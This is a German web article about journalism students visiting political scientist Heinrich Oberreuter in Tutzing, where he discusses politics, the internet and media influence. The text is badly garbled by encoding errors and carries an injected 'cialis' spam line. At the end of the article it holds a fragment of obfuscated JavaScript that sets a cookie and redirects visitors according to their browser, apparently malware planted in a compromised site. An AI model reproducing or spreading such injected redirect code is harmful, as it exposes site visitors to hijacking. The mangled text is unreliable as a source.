Besuch bei einem Dinosaurier

prix du cialis, wintomylon.

Prof. Dr. Heinrich Oberreuther (Foto: T. Tzschaschel)

Heinrich Oberreuter, Direktor der Akademie fA?r Politische Bildung Tutzing, empfing die Abschlussklasse Journalismus der Macromedia Hochschule fA?r Medien und Kommunikation (MHMK MA?nchen) in seinen RAi??umlichkeiten. Schnell entstand eine angeregte Diskussion rund um Politik, neue Medien und deren gegenseitige Beeinflussung. Oberreuter bewies mit A?berraschend modernen Ansichten, dass er, obwohl mit 68 Jahren eigentlich schon Medien-Dinosaurier, immer noch dem Puls der Zeit lauschen und ihn interpretieren kann. So brach er auch eine Lanze fA?r das Internet:Ai?? ai??zMedien sind KrA?cken. Das Medium, welches der direkten Kommunikation am nAi??chsten kommt, ist automatisch das Beste – und das ist im Moment das Internet.ai???

Weiter bewertet er das VerhAi??ltnis zwischen Politik und Medien dennoch als angespannt. Auf der einen Seite versuchen Politiker in unangenehmer RegelmAi??AYigkeit Medien fA?r ihre Zwecke zu instrumentalisieren. ai??zImmer wenn ihnen das gelingt, hat der klassische Journalismus versagtai???, so Oberreuter. Auf der anderen Seite beeinflusst auch die Berichterstattung der Medien A?ber tagesaktuelle Ereignisse die Politik massiv. ai??zDer Bilderjournalismus und die Unmittelbarkeit des modernen Journalismus zwingt die Politik dazu sich mit Themen zu befassen, die so nicht auf der Agenda standen.ai??? Als Beispiel nannte Oberreuter die Reaktion der Politik die Berichterstattung A?ber das AtomunglA?ck in Fukushima und nannte den verfrA?hten Atomausstieg reinen Opportunismus.

Organisiert worden war der studentische Besuch von MHMK-Journalistik-Professor Dr. Hektor HaarkAi??tter und dem Journalistik-Dozenten Dr. Jost KA?pper. Letzterer war einst Doktorand von Prof. Oberreuther und hatte all seine persAi??nlichen Kontakte in die Waagschale geworfen, um diese Exkursion zu ermAi??glichen. Die Akademie fA?r Politische Bildung (APB) in Tutzing liegt malerisch an den Gestaden des Starnberger Sees und ist eine parteipolitisch unabhAi??ngige Anstalt des Ai??ffentlichen Rechts. Sie versteht sich als Forum der Information und Kommunikation A?ber aktuelle und grundsAi??tzliche Themen der nationalen und internationalen Politik. AuAYerdem fungiert die Akademie als Weiterbildungs- und BegegnungsstAi??tte. GegrA?ndet wurde die Einrichtung im Jahre 1957 vom Bayerischen Landtag und ist in ihrer Konstruktion einzigartig in der politischen Bildungslandschaft Deutschlands. Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Facebook Like

Comments are closed.